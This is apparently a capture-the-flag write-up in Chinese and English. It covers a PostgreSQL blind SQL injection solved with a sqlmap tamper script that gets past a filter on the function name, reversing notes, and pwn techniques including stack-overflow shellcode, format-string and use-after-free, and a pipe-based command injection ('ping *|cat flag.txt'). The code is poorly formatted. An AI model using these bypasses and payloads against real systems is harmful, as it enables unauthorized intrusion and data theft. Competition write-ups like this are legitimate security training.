先吐槽,第一天做的时候web100表里面居然flag字段为空,就以为是个坑,到处翻表,结果是被人搅了而已,那么卡的服务器居然出的是时间盲注真是醉了。
当url中出现大写的PG_SLEEP的时候就会返回can’t use sleep,测试小写的时候发现可以成功sleep并不拦截。因此写个tamper用sqlmap跑,tamper代码如下:
1 2 3 4 5 6 7 8
defdependencies(): pass
deftamper(payload, **kwargs):
retVal = payload.replace("PG_SLEEP","pg_sleep");
return retVal
sqlmap的关键参数是 --tamper xxx.py --technique T --dbms postgresql –D public –T web100 --dump 在flag字段注入出flag。
递归查{} 注意从源码复制和嵌套,爆破也可以,脚本跑出来一直是267,不对( ⊙ o ⊙ )啊!
默默+1 -1 发现266对了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
#-*-coding:utf-8-*- defCount(): s = '''the string without \\''' cnt = 0 left = 0 for i in s: if i == '{': left += 1 if i == '}': if (left > 0): left -= 1 cnt += 1 print cnt
str1 = '62C5J110119120L' str2 = '' for i inrange(len(str1)): str2 += chr(ord(str1[i]) + 49 )
print str2
Re2:
a interesting Reverse, use SEH to control execute process.
breakpoint in SEH process function(0x401000) and then trigger off a exception.
there is a simply labyrinth.
everytime I can +8,-8,+1,-1
from 0x00409046 to 0x00409053
cannot on 0x2A,length 25.
Re3:
use a table to control execution.
breakpoint on every case to switch.
look at the parameter of every crucial function(strcmp, strlen and so on)
input len : 13, every -0x80, compare with a string.
Pwn1:
no NX, a global buffer we can enter into.
a stack overflow, no cookie.
arrange shellcode in global buffer, use stack overflow to return to buffer,getshell.
Pwn2:
no NX, a global buffer we can enter into.
a fsb, we can leak address.
a uaf, we can jmp to anywhere.
but we cannot write shellcode in global buffer,beacuse we use uaf, the buffer will be corrupted.
so, leak stack address, and then use uaf return to stack buffer.
Pwn3:
NX, cannot execute shellcode in stack and heap.
safe stack, cannot overflow the stack
but,there is a fsb and a command injection.
bypass '>', ';', '<'
use pipe.
but cannot getshell.
payload "ping *|ls"
look at the file of flag's name,flag.txt
use payload again "ping *|cat flag.txt"